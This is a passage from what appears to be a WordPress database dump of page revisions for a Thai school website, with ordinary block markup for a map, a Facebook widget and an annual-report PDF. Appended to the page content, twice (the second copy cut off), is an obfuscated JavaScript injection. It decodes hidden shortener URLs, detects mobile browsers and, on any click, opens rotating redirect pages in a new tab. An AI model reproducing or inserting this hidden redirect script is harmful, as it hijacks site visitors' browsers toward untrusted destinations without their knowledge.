t\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-08 16:02:50','2024-08-08 09:02:50','',14,'http://pakhaeng.ssk.in.th/?p=706',0,'revision','',0),
(707,1,'2024-08-08 16:06:49','2024-08-08 09:06:49','<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:file {\"id\":704,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการปฏิบัติงานประจำปี\"></object><a id=\"wp-block-file--media-0e250fcb-517a-44a8-a574-b3f80330476c\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">รายงานผลการปฏิบัติงานประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการปฏิบัติงานประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-0e250fcb-517a-44a8-a574-b3f80330476c\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let 